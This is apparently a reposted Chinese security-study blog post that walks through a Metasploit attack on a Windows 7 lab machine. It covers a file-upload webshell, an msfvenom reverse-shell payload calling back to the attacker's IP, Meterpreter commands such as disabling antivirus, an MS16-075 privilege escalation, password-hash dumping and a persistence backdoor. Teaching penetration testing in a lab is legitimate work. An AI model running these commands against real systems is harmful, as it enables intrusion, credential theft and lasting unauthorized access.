主頁 >  其他 > MSF(1)——一次完整的滲透流程

MSF(1)——一次完整的滲透流程

2021-09-05 07:29:53 其他

本專欄是筆者的網路安全學習筆記,一面分享,同時作為筆記

前文鏈接

  1. WAMP/DVWA/sqli-labs 搭建
  2. burpsuite工具抓包及Intruder暴力破解的使用
  3. 目錄掃描,請求重發,漏洞掃描等工具的使用
  4. 網站資訊收集及nmap的下載使用
  5. SQL注入(1)——了解成因和手工注入方法
  6. SQL注入(2)——各種注入
  7. SQL注入(3)——SQLMAP
  8. SQL注入(4)——實戰SQL注入拿webshell
  9. Vulnhub靶機滲透之Me and My Girlfriend
  10. XSS漏洞
  11. 檔案上傳漏洞
  12. 檔案上傳繞過
  13. 檔案包含漏洞
  14. Vulnhub靶機滲透之zico2
  15. 命令執行漏洞
  16. 邏輯漏洞(越權訪問和支付漏洞)
  17. 網站后臺安全
  18. weevely的使用及免殺(Linux中的菜刀)

Metasploit(簡稱msf)框架是一個開源的,旨在方便地進行滲透測驗的框架,由Ruby語言撰寫而成,具有很好地拓展性,便于滲透測驗人員開發,使用定制的工具模板,

Kali Linux自帶了Metasploit,在控制臺輸入msfconsole,啟動msf
在這里插入圖片描述
kali中自帶的msf版本是5,可自行升級,

筆者的話:本來我是不想寫msf框架的,因為我認為Web安全只需要拿到WebShell就達到了目標,但是在我經過了幾次實戰時候,我發現了msf的重要性,msf框架在漏洞掃描,后滲透等多個方面都非常優秀,因此有了這篇文章,

Metasploit基礎

msf存在多個模塊,在這里進行介紹

  1. Auxiliaries(輔助模塊)
該模塊不會直接在測驗者和目標主機之間建立訪問,它們只負責執行
掃描、嗅探、指紋識別等相關功能以輔助滲透測驗
  1. Exploit(漏洞利用模塊)
漏洞利用是指由滲透測驗者利用一個系統、應用或者服務中的安全漏洞
進行的攻擊行為,流行的滲透攻擊技術包括緩沖區溢位、Web應用程式
攻擊,以及利用配置錯誤等,其中包含攻擊者或滲透測驗人員針對系統
中的漏洞而設計的各種POC驗證程式,用于破壞系統安全性的攻擊代碼,
每個漏洞都有相應的攻擊代碼,
  1. Payload(攻擊載荷模塊)
攻擊載荷是我們期望目標系統在被滲透攻擊之后完成實際攻擊功能的代碼,
成功滲透目標后,用于在目標系統上運行任意命令或者執行特定代碼,
在Metasploit框架中可以自由地選擇、傳送和植入,攻擊載荷也可能
是簡單地在目標作業系統系統上執行一些命令,如添加用戶賬號等,
  1. Post(后滲透模塊)
該模塊主要用于在取得目標系統遠程控制權后,進行一系列的后滲透
攻擊動作,如獲取敏感資訊、實施跳板攻擊等,
  1. Encoders(編碼工具模塊)
該模塊在滲透測驗中負責免殺,以防止被殺毒軟體、防火墻、
IDS及類似的安全軟體檢測出,

我將通過一個完整的滲透測驗來進行msf框架的初步講解,這是我在一次實戰中的操作,我用虛擬機進行了簡單的模擬,

攻擊機(Kali):192.168.157.131
目標機(Win7 x64):192.168.157.128

實戰

訪問目標機,看見一個檔案上傳點,
在這里插入圖片描述
嘗試上傳WebShell,提示 “不正確的檔案型別”
在這里插入圖片描述
使用bp抓包,上傳圖片馬,提示保存成功
在這里插入圖片描述
把后綴改為php,成功上傳
在這里插入圖片描述
蟻劍訪問,成功獲取WebShell
在這里插入圖片描述
使用whoami指令查看當前權限
在這里插入圖片描述
在Kali中輸入以下指令生成一個msf的木馬

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.157.131 lport=4444 -f exe > shell.exe

其中, windows/meterpreter/reverse_tcp 是msf將要使用的 payloadlhost 是攻擊機的ip地址,lport 是攻擊機將要監聽的埠,

通過這個陳述句,生成一個exe的木馬
在這里插入圖片描述
接下來將木馬上傳到被攻擊的服務器上
在這里插入圖片描述
在kali下輸入msfconsole進入msf的控制臺
輸入:use exploit/multi/handler進入遠程控制模塊
輸入:set payload windows/meterpreter/reverse_tcp使用Windows tcp遠程反彈Payload
在這里插入圖片描述
輸入options查看該模塊的引數
在這里插入圖片描述
其中 LHOST 是生成木馬時填寫的 lhostLPORT 是生成木馬時填寫的 lport

輸入:set LHOST 192.168.157.131來設定攻擊機ip地址
輸入:set LPORT 4444來設定攻擊機監聽埠
在這里插入圖片描述
可以通過options查看當前引數
在這里插入圖片描述
引數中Require的值為Yes的引數是必填項

接下來,輸入runexploit開始監聽
在這里插入圖片描述

同時,在蟻劍中,進入控制臺,輸入shell.exe運行我們先前上傳的木馬程式
在這里插入圖片描述
此時可以看到,在msf中收到了回應,反彈了一個Meterpreter的shell
在這里插入圖片描述
Meterpreter中輸入help查看幫助資訊,在這里簡單講解一些指令

Meterpreter

Meterpreter常用指令
指令介紹
migrate行程遷徙,可以通過“migrate pid”來遷徙到其他行程中,其中,pid是被遷徙的行程id,(注:只有Windows可用)
getuid獲取當前權限
getpid獲取當前行程id
sysinfo回傳系統資訊
getsystem直接提升到最高權限(一般成功不了)
run killav關閉殺毒軟體,在取得Meterpreter shell后最好最先執行該陳述句
shell進入目標機shell,輸入“exit”退回到Meterpreter
pwd或getwd查看當前處于目標機的哪個目錄
ls列出當前目錄下的所有檔案
cd切換目錄
search在目標機中搜索檔案,例如輸入“search -f *.txt -d C:/”搜索C盤中所有后綴為txt的檔案
upload上傳檔案,例如輸入“upload 1.txt C:/1.txt”將攻擊機目錄下的1.txt上傳到目標機的C盤
download下載檔案,例如輸入“download C:/1.txt 1.txt”將目標機C盤下的1.txt下載到攻擊機上

提權

輸入getuid查看當前權限,發現是manlu權限
在這里插入圖片描述
輸入shell進入目標機shell,輸入systeminfo查看系統詳細資訊,包括但不限于系統補丁資訊
在這里插入圖片描述
在這里插入圖片描述
接下來要在補丁中查找那些沒有打的補丁,并且去網上找相關的exp進行提權

在這里我使用ms16_075 (KB3164038) 漏洞進行提權

回到meterpreter shell,輸入background將當前shell轉為后臺執行,可以輸入sessions查看目前已建立的session
在這里插入圖片描述
接下來輸入search ms16_075尋找相應的exp
在這里插入圖片描述
可以看到,名為exploit/windows/local/ms16_075_reflection_juicy的exp評價是great,在這里就使用該exp進行提權

輸入:use exploit/windows/local/ms16_075_reflection_juicyuse 1來選取要使用的exp
在這里插入圖片描述
輸入options查看該exp引數
在這里插入圖片描述
只有一個引數SESSION需要填寫

輸入sessions查看建立的連接,找到需要提權的session,通過SET指定SESSION
在這里插入圖片描述
接下來輸入run執行即可

如果提權成功,會重新回傳一個Meterpreter shell
在這里插入圖片描述
此時再輸入getuid查看權限,發現我們已經是system
在這里插入圖片描述

抓取密碼

在這里簡單講一下密碼的抓取,具體的密碼抓取會在之后詳細講解

在Meterpreter shell中輸入run windows/gather/hashdump匯出密碼
在這里插入圖片描述
得到密碼的格式是類似這樣的

UserName:500:xxxx:xxxx

其中第一個是用戶名,第二個數字代表權限,500表示是管理員權限,后面兩個加密的內容是密碼,其中第二個加密的內容就是用戶密碼

例如,我想獲取用戶manlu的密碼,我將密文復制

32ed87bdb5fdc5e9cba88547376818d4

接下來在網上解密
在這里插入圖片描述
得到用戶manlu的明文密碼為123456

注:抓取密碼需要SYSTEM權限

權限維持

我們通過持久化后門來進行權限維持

Persistence是一款使用安裝自啟動方式的持久性后門程式,可以利用它創建注冊和檔案,

輸入run persistence -h查看所有的命令選項

在這里插入圖片描述
輸入指令:

run persistence -A -S -U -i 10 -p 1234 -r 192.168.157.131

語法解釋:

  • A:自動啟動Payload程式
  • S:系統啟動時自動加載
  • U:用戶登錄時自動啟動
  • X:開機時自動加載
  • i:回連的時間間隔
  • P:監聽的反向鏈接埠號
  • r:攻擊機IP地址

在這個陳述句中,我設定每隔10秒鐘回連一次,這樣目標機就會每隔10秒連接一次攻擊機,

可以看到,在輸入指令后,提示在目標機上新建了一個vbs檔案并創建了一個服務,
在這里插入圖片描述
此時我們重新打開一個msf終端,設定
payload:

windows/meterpreter/reverse_tcp

lhost:

192.168.157.131

lport:

1234

等待10秒,就可以收到目標機的連接
在這里插入圖片描述
這樣成功創建了持久化后門

結語

這篇文章并不是正式的教程,只是為了寫一下使用Metasploit框架滲透的基本流程,同時寫出msf框架的強大之處,在之后的文章,會詳細寫Metasploit框架的操作,

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/297518.html

標籤:其他

上一篇:內網安全之:Metasploit 跳板攻擊:portfwd 埠轉發與埠映射

下一篇:命令執行總結

標籤雲
其他(157675) Python(38076) JavaScript(25376) Java(17977) C(15215) 區塊鏈(8255) C#(7972) AI(7469) 爪哇(7425) MySQL(7132) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5869) 数组(5741) R(5409) Linux(5327) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4554) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2429) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1958) Web開發(1951) python-3.x(1918) HtmlCss(1915) 弹簧靴(1913) C++(1909) xml(1889) PostgreSQL(1872) .NETCore(1853) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • 網閘典型架構簡述

    網閘架構一般分為兩種:三主機的三系統架構網閘和雙主機的2+1架構網閘。 三主機架構分別為內端機、外端機和仲裁機。三機無論從軟體和硬體上均各自獨立。首先從硬體上來看,三機都用各自獨立的主板、記憶體及存盤設備。從軟體上來看,三機有各自獨立的作業系統。這樣能達到完全的三機獨立。對于“2+1”系統,“2”分為 ......

    uj5u.com 2020-09-10 02:00:44 more
  • 如何從xshell上傳檔案到centos linux虛擬機里

    如何從xshell上傳檔案到centos linux虛擬機里及:虛擬機CentOs下執行 yum -y install lrzsz命令,出現錯誤:鏡像無法找到軟體包 前言 一、安裝lrzsz步驟 二、上傳檔案 三、遇到的問題及解決方案 總結 前言 提示:其實很簡單,往虛擬機上安裝一個上傳檔案的工具 ......

    uj5u.com 2020-09-10 02:00:47 more
  • 一、SQLMAP入門

    一、SQLMAP入門 1、判斷是否存在注入 sqlmap.py -u 網址/id=1 id=1不可缺少。當注入點后面的引數大于兩個時。需要加雙引號, sqlmap.py -u "網址/id=1&uid=1" 2、判斷文本中的請求是否存在注入 從文本中加載http請求,SQLMAP可以從一個文本檔案中 ......

    uj5u.com 2020-09-10 02:00:50 more
  • Metasploit 簡單使用教程

    metasploit 簡單使用教程 浩先生, 2020-08-28 16:18:25 分類專欄: kail 網路安全 linux 文章標簽: linux資訊安全 編輯 著作權 metasploit 使用教程 前言 一、Metasploit是什么? 二、準備作業 三、具體步驟 前言 Msfconsole ......

    uj5u.com 2020-09-10 02:00:53 more
  • 游戲逆向之驅動層與用戶層通訊

    驅動層代碼: #pragma once #include <ntifs.h> #define add_code CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS) /* 更多游戲逆向視頻www.yxfzedu.com ......

    uj5u.com 2020-09-10 02:00:56 more
  • 北斗電力時鐘(北斗授時服務器)讓網路資料更精準

    北斗電力時鐘(北斗授時服務器)讓網路資料更精準 北斗電力時鐘(北斗授時服務器)讓網路資料更精準 京準電子科技官微——ahjzsz 近幾年,資訊技術的得了快速發展,互聯網在逐漸普及,其在人們生活和生產中都得到了廣泛應用,并且取得了不錯的應用效果。計算機網路資訊在電力系統中的應用,一方面使電力系統的運行 ......

    uj5u.com 2020-09-10 02:01:03 more
  • 【CTF】CTFHub 技能樹 彩蛋 writeup

    ?碎碎念 CTFHub:https://www.ctfhub.com/ 筆者入門CTF時時剛開始刷的是bugku的舊平臺,后來才有了CTFHub。 感覺不論是網頁UI設計,還是題目質量,賽事跟蹤,工具軟體都做得很不錯。 而且因為獨到的金幣制度的確讓人有一種想去刷題賺金幣的感覺。 個人還是非常喜歡這個 ......

    uj5u.com 2020-09-10 02:04:05 more
  • 02windows基礎操作

    我學到了一下幾點 Windows系統目錄結構與滲透的作用 常見Windows的服務詳解 Windows埠詳解 常用的Windows注冊表詳解 hacker DOS命令詳解(net user / type /md /rd/ dir /cd /net use copy、批處理 等) 利用dos命令制作 ......

    uj5u.com 2020-09-10 02:04:18 more
  • 03.Linux基礎操作

    我學到了以下幾點 01Linux系統介紹02系統安裝,密碼啊破解03Linux常用命令04LAMP 01LINUX windows: win03 8 12 16 19 配置不繁瑣 Linux:redhat,centos(紅帽社區版),Ubuntu server,suse unix:金融機構,證券,銀 ......

    uj5u.com 2020-09-10 02:04:30 more
  • 05HTML

    01HTML介紹 02頭部標簽講解03基礎標簽講解04表單標簽講解 HTML前段語言 js1.了解代碼2.根據代碼 懂得挖掘漏洞 (POST注入/XSS漏洞上傳)3.黑帽seo 白帽seo 客戶網站被黑帽植入劫持代碼如何處理4.熟悉html表單 <html><head><title>TDK標題,描述 ......

    uj5u.com 2020-09-10 02:04:36 more
最新发布
  • 2023年最新微信小程式抓包教程

    01 開門見山 隔一個月發一篇文章,不過分。 首先回顧一下《微信系結手機號資料庫被脫庫事件》,我也是第一時間得知了這個訊息,然后跟蹤了整件事情的經過。下面是這起事件的相關截圖以及近日流出的一萬條資料樣本: 個人認為這件事也沒什么,還不如關注一下之前45億快遞資料查詢渠道疑似在近日復活的訊息。 訊息是 ......

    uj5u.com 2023-04-20 08:48:24 more
  • web3 產品介紹:metamask 錢包 使用最多的瀏覽器插件錢包

    Metamask錢包是一種基于區塊鏈技術的數字貨幣錢包,它允許用戶在安全、便捷的環境下管理自己的加密資產。Metamask錢包是以太坊生態系統中最流行的錢包之一,它具有易于使用、安全性高和功能強大等優點。 本文將詳細介紹Metamask錢包的功能和使用方法。 一、 Metamask錢包的功能 數字資 ......

    uj5u.com 2023-04-20 08:47:46 more
  • vulnhub_Earth

    前言 靶機地址->>>vulnhub_Earth 攻擊機ip:192.168.20.121 靶機ip:192.168.20.122 參考文章 https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.html https://www.cnb ......

    uj5u.com 2023-04-20 07:46:20 more
  • 從4k到42k,軟體測驗工程師的漲薪史,給我看哭了

    清明節一過,盲猜大家已經無心上班,在數著日子準備過五一,但一想到銀行卡里的余額……瞬間心情就不美麗了。最近,2023年高校畢業生就業調查顯示,本科畢業月平均起薪為5825元。調查一出,便有很多同學表示自己又被平均了。看著這一資料,不免讓人想到前不久中國青年報的一項調查:近六成大學生認為畢業10年內會 ......

    uj5u.com 2023-04-20 07:44:00 more
  • 最新版本 Stable Diffusion 開源 AI 繪畫工具之中文自動提詞篇

    🎈 標簽生成器 由于輸入正向提示詞 prompt 和反向提示詞 negative prompt 都是使用英文,所以對學習母語的我們非常不友好 使用網址:https://tinygeeker.github.io/p/ai-prompt-generator 這個網址是為了讓大家在使用 AI 繪畫的時候 ......

    uj5u.com 2023-04-20 07:43:36 more
  • 漫談前端自動化測驗演進之路及測驗工具分析

    隨著前端技術的不斷發展和應用程式的日益復雜,前端自動化測驗也在不斷演進。隨著 Web 應用程式變得越來越復雜,自動化測驗的需求也越來越高。如今,自動化測驗已經成為 Web 應用程式開發程序中不可或缺的一部分,它們可以幫助開發人員更快地發現和修復錯誤,提高應用程式的性能和可靠性。 ......

    uj5u.com 2023-04-20 07:43:16 more
  • CANN開發實踐:4個DVPP記憶體問題的典型案例解讀

    摘要:由于DVPP媒體資料處理功能對存放輸入、輸出資料的記憶體有更高的要求(例如,記憶體首地址128位元組對齊),因此需呼叫專用的記憶體申請介面,那么本期就分享幾個關于DVPP記憶體問題的典型案例,并給出原因分析及解決方法。 本文分享自華為云社區《FAQ_DVPP記憶體問題案例》,作者:昇騰CANN。 DVPP ......

    uj5u.com 2023-04-20 07:43:03 more
  • msf學習

    msf學習 以kali自帶的msf為例 一、msf核心模塊與功能 msf模塊都放在/usr/share/metasploit-framework/modules目錄下 1、auxiliary 輔助模塊,輔助滲透(埠掃描、登錄密碼爆破、漏洞驗證等) 2、encoders 編碼器模塊,主要包含各種編碼 ......

    uj5u.com 2023-04-20 07:42:59 more
  • Halcon軟體安裝與界面簡介

    1. 下載Halcon17版本到到本地 2. 雙擊安裝包后 3. 步驟如下 1.2 Halcon軟體安裝 界面分為四大塊 1. Halcon的五個助手 1) 影像采集助手:與相機連接,設定相機引數,采集影像 2) 標定助手:九點標定或是其它的標定,生成標定檔案及內參外參,可以將像素單位轉換為長度單位 ......

    uj5u.com 2023-04-20 07:42:17 more
  • 在MacOS下使用Unity3D開發游戲

    第一次發博客,先發一下我的游戲開發環境吧。 去年2月份買了一臺MacBookPro2021 M1pro(以下簡稱mbp),這一年來一直在用mbp開發游戲。我大致分享一下我的開發工具以及使用體驗。 1、Unity 官網鏈接: https://unity.cn/releases 我一般使用的Apple ......

    uj5u.com 2023-04-20 07:40:19 more